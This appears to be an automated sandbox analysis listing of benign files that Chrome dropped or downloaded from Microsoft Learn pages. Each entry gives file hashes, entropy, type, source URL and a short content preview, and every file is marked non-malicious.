                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):464328
                                                                                                                                                                                                            Entropy (8bit):5.074669864961383
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                            MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                            SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                            SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                            SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:HMB:k
                                                                                                                                                                                                            MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                            SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                            SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                            SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                            Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):195719
                                                                                                                                                                                                            Entropy (8bit):5.430057012529021
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
                                                                                                                                                                                                            MD5:9445D8D43537540BC89651C93A9C3832
                                                                                                                                                                                                            SHA1:EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
                                                                                                                                                                                                            SHA-256:586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
                                                                                                                                                                                                            SHA-512:F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25441
                                                                                                                                                                                                            Entropy (8bit):5.152769469811509
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                                            MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                                            SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                                            SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                                            SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):25441
                                                                                                                                                                                                            Entropy (8bit):5.152769469811509
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                                                            MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                                                            SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                                                            SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                                                            SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                            Malicious:false
